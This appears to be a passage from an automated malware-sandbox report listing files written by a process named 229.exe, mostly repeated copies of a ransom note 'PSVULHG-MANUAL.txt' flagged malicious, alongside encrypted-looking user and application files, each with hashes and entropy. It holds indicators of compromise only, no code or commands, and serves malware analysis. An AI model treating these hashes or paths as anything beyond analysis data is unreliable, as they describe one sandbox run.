SHA-512:	B0BD6F1C4DD466D5979DF1E590A21E7F371F2C0BBCE55193931532C2F0C9F4ADFE33CBC2EE5993FD4B1C845AC5C38A510F7AE9E71A231D95885E4676D3A8F59A
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\security\policy\unlimited\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\.jre\lib\security\policy\unlimited\US_export_policy.jar Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	3563
Entropy (8bit):	7.951995190686471
Encrypted:	false
MD5:	4DEF94FB86F81837B6C251D739145E75
SHA1:	E52A53C8C6FC28F7EC07D571D81C95939356CA4B
SHA-256:	240773CAF4152C3A84561791B57732B53B5356F8D1C09DB8B58D4C493E980885
SHA-512:	D4CEB26F1B063C6250A7BE24E3FD5570475705616A54D0DCA4508B0D45C776926D2C503749FBF4AB9B805B2AFC0FCCA5037EB4AAC062C6419B00770685041FB8
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\security\policy\unlimited\local_policy.jar Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	3575
Entropy (8bit):	7.949954536840907
Encrypted:	false
MD5:	01B5361B017A6BEA5B89053233BB3EEF
SHA1:	375DF9970D299C37DDB1B1630D798419FF1C733C
SHA-256:	9AE97EBDC3F247025E6D8D593F80236A28CBEE559A987FCFDDDD571D59EA1B7A
SHA-512:	E22FF278DBF64160FD5775D5B752C2E70B168615F1B4C10575AE027B28F24EDD7D11F469D4BFD99B339DE76F845F6BAF518C25F49AAF486E6C83EF31F18A867E
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\sound.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1750
Entropy (8bit):	7.8824319538813015
Encrypted:	false
MD5:	D24E7ABD352F3FA727A8E27B1CC72B7E
SHA1:	8ECED76C2346D34F63EB06B4312CCA44799E9ED2
SHA-256:	E8AA836BE08908F08457B36E68973BCF65EF3D2D5A1FDA4E08AE3B5CDCDCCF22
SHA-512:	79BF2952B15ADAD7890A1972CEA9A71960E860EBBD9862DC31F06A40CFCA52576AE70CF3FDF2328A94C8C7956305FDE42F3531C25763086399A7F16403BF19C7
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\tzdb.dat Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	106422
Entropy (8bit):	7.998184130526991
Encrypted:	true
MD5:	B302011926DD55ACC77948D78F96768D
SHA1:	50DE97D60CB27A14E712A89283DA2D1426599BA0
SHA-256:	05563568BD2F42572C2C4E74CF951D2849920A7AAFC8953D54712B09E45B94AB
SHA-512:	EDF928CB8710494486C4C673534BB97EC9E554D83BC6DD774F672C9FE0F9AD2AD02A4D5DED870E4285E877A51ED6061CD8FFB6B4454C8A6D4DAB2D232FBC903A
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\tzmappings Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	10117
Entropy (8bit):	7.97914862278751
Encrypted:	false
MD5:	B2C477C92D53D646D1021D0BC2A85EE1
SHA1:	D8FF144FCEEFB0BD69171B1B4ECD3FA74AA5C252
SHA-256:	CEA19CAD63042DD97590FF49ACE2A599BAD8D7FDB27E12E4981BE205F5A518D9
SHA-512:	0BB6A605ED2617295E024766DD12F5BB34806894F4971B0F542DBB1960E9B61C4D35396C7B04BF1AA5635729BC5A3E96957CB677C64D1D594C870772191BE01E
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\release Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	965
Entropy (8bit):	7.786117061812621
Encrypted:	false
MD5:	B5094AEDE1671972889474F33E63B8CF
SHA1:	E34319F2D9603869FFF9B5A1BD8837AE7179B978
SHA-256:	FE0DEDEC4B6EFA15C16C38A093F8F9D3425C25C8D66794CF6098410492E6CE54
SHA-512:	83064C5439281383B590AC2B8C8B529B08A0477F7E8EFBF35C4C505218C5BA554DDB31536C94E2C2758F536652CF7A5EA356FE1AAB79E4720756BDDB10322ABB
Malicious:	false

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Collab\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Forms\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\JSCache\GlobData Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	562
Entropy (8bit):	7.614155011166219
Encrypted:	false
MD5:	1BD677686223815B1AEBA84476B8E2DF
SHA1:	40F0CB38EAD2B4A618E98D10A8120CFBF9AB1E04
SHA-256:	B8C33B416A6A449DD6D0142E817893741B1BA6D5355DEA352FE124DBB2EB115B
SHA-512:	540009ABBBB638F2110143DE1F259CB7A56126C0D4E2236120D346B3B9085E84C76E8332E6A0E58E278530DF5DF7F55A0CA7842D5AB4BCFE9FDD4B9E5B76C466
Malicious:	false

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\JSCache\GlobSettings Download File
Process:	C:\Windows\Temp\229.exe
File Type:	zlib compressed data
Size (bytes):	564
Entropy (8bit):	7.554881108122903
Encrypted:	false
MD5:	BD82DDA096A9126EF72AA9EE997EE7D7
SHA1:	BEA931B346FCBD7B28D63CB1B4ECC8A67A4C380D
SHA-256:	CF1F7F7E426F32499535AEBE40D07808F2B1E88BB3801C05824CDE4966ABE827
SHA-512:	EC57444299C39437A6AE3ABD6DC2F216D4FC4D31103014F24765CF996E2A3F6BBE26DE58D0DE9D7C2A4EDF6D8492371D99D1E7E5740F40649F5476187DC3F722
Malicious:	false

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\JSCache\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1438
Entropy (8bit):	7.846496203941103
Encrypted:	false
MD5:	2E3F57FA29A35A96509444F84ED62C67
SHA1:	EB09BF71BA4C26EDD183DA2651AA44B5F1755272
SHA-256:	543E229CCEB61E8DC1055BEA522350774F14915380D8EC681EB2C87BCEAAA2A8
SHA-512:	B3E26BC4FDBD430D1F1B724DA3B9B9D335A4A7F362262DBB6CB841F56F2664E5508296C6DE973DD3D9EB5EBE792386C4C21098BC14D4F1FD32507B35F1608EB9
Malicious:	false

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	35654
Entropy (8bit):	7.994234790775425
Encrypted:	true
MD5:	9AFDF0D9A54AE4BD58E4BBF5D17FA83F
SHA1:	F0E355329C92E16E242961A722950DB10E233EC9
SHA-256:	3831C5F3219DB6A99CBE77D44A0F32A2B02EAFCE0929E107F979DC08D3441177
SHA-512:	402BDC74EE216FBB5AA0593009C8A9478B64068F9BCD307C92585744D66CF87E4F00938EC027BCF24D1E1FA52734B353159FD25C84B86AE2790E78041EDAED22
Malicious:	false

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\CRLCache\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\addressbook.acrodata Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	8410
Entropy (8bit):	7.9773790989252795
Encrypted:	false
MD5:	B245C796F22FCD39034B8EB190DC95BC
SHA1:	0A31C27C76CBC7864021B25110AA7F22B4845496
SHA-256:	BAC426962770263ADD9A4891ED66C37625618B1B9B08B3D1DD56B2EB8386DA06
SHA-512:	99A092CA047B86924F31B73E478731F35DA68FF53FD1867E24F66947E03B700B2545F5F950EF1D89985001C7B4EFA6975D82E16FE95A12F74A3F60DE293B8764
Malicious:	false

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\services_rdr.dat Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	10780
Entropy (8bit):	7.9846220107549755
Encrypted:	false
MD5:	8BF2BFD064E22297254948686BBD5449
SHA1:	6E5047C68AAB6642C49DC10049D28BC40725AC1E
SHA-256:	EECD64077316A9C9E9247FA6D89990E8214C9C88FCC446330421AD731B9D3413
SHA-512:	D43EB2924B6C9EBB7AAE88DDC285B5F304CBA7C5FCEF99A2A26C0FD75674C6C26EB284BE036C3E67C757F6988BFA20A2AF71E7E18ABD0374031274B048C8130B
Malicious:	false

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\services_rdri.dat Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	24692
Entropy (8bit):	7.9930507227200325
Encrypted:	true
MD5:	3C5C5C4D13DBA44C2B169F51CF5F3253
SHA1:	547FC7A0B20F8361453D6138A75ACFCACEAC71A8
SHA-256:	FDDE7E3DF904C190818D417D7A75645090DD5DDEE987FCC69BF565A7DCA6E7F8
SHA-512:	EDF2FAC3A2784A20A94D09B6C0DA59F892EA7455078FD323EAB586E7E249FEAEC94791C229A98997A1933F4A93C6A6081589FF8618C71C50943719647A85F13E
Malicious:	false

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\services_rdrk.dat Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	804
Entropy (8bit):	7.706456873353809
Encrypted:	false
MD5:	BD542627981D5ECA31554D479944131E
SHA1:	6B8F1F8AFCE17A60D2DFA5BA564AB89CA4D9A80C
SHA-256:	4F2AFB69529A3B8A5A2D5C656DDDCF1EB3D456C384C9EDC85FC3C102CFE70A06
SHA-512:	71CBC4A872610A021C3B3F8B77E74FB21CFE0E5C924BBCF759F993F5866B708956CDF0BE611A04F02D3EE72790199B0F555C4B78EAE5E2D5E940A3DB40A6B5C6
Malicious:	false

C:\Users\user\AppData\Roaming\Adobe\Acrobat\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Adobe\Flash Player\AssetCache\P4MTYZFY\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Adobe\Flash Player\AssetCache\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Adobe\Flash Player\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Adobe\Headlights\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Adobe\Linguistics\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Adobe\LogTransport2\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Adobe\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Identities\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Identities\{7E3C98C2-A457-4C7B-90BC-6B7522D9BDED}\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Media Center Programs\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\AddIns\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Credentials\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Crypto\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312302014-279660585-3511680526-1004\4aacbf725e5908a192ccd61db75414d6_041d84af-7e76-450d-8340-55db3c73c359 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	591
Entropy (8bit):	7.565418845337299
Encrypted:	false
MD5:	0378AEE5097D97484B427F931D279256
SHA1:	5627E9DFA4EAA17F5027752E4D67C518CF06619A
SHA-256:	7EBACCD07EE47EE90F3CC1427106691B1C5342679196A766A9D223F674CA6AD1
SHA-512:	54BDC043C448EC51D00DFDFBE7A8D3FB58C915D22500D624400552EB1C399766858BBE6E002BA0B46903F61C717E7338EFF4C1C8BFD53EA44B5BEE9A9DC1DB7C
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312302014-279660585-3511680526-1004\83aa4cc77f591dfc2374580bbd95f6ba_041d84af-7e76-450d-8340-55db3c73c359 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	585
Entropy (8bit):	7.582275307404216
Encrypted:	false
MD5:	2ADC8946811E74DD058F9876280C99E2
SHA1:	C57824270CE2D492C04AC08D2592C822AC042446
SHA-256:	540E4FD65519BB5FAD978FC1EEF5CCA9FF7179D07209C7427A00FC9446A45546
SHA-512:	B9D9376758C42C0AB7E8DC0103E8519BCE8905C5458E9A9096650F1780789660CFB4149F78E2ADBAA68971B408FD1C4101EB26765DFFACAF15C04CBF1A146C43
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312302014-279660585-3511680526-1004\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	4187847
Entropy (8bit):	7.999955190606157
Encrypted:	true
MD5:	4E272EB499BEB27DD94F23DB7B8DE2F9
SHA1:	F3ED5B02CE45985276B887094C0C75FC5D25937D
SHA-256:	B3F7D91220E11C32A947F1645798508D00D8121824118FBB408B7F1B1899FFC3
SHA-512:	B6340FAD6AD4C85C380324458F14E5ED2CEF591A099BAE3A036568C270FD29765C8F46AA3CEC8026EFDF36489D5AA22647A8C845354630644F53416FDAC99F3D
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
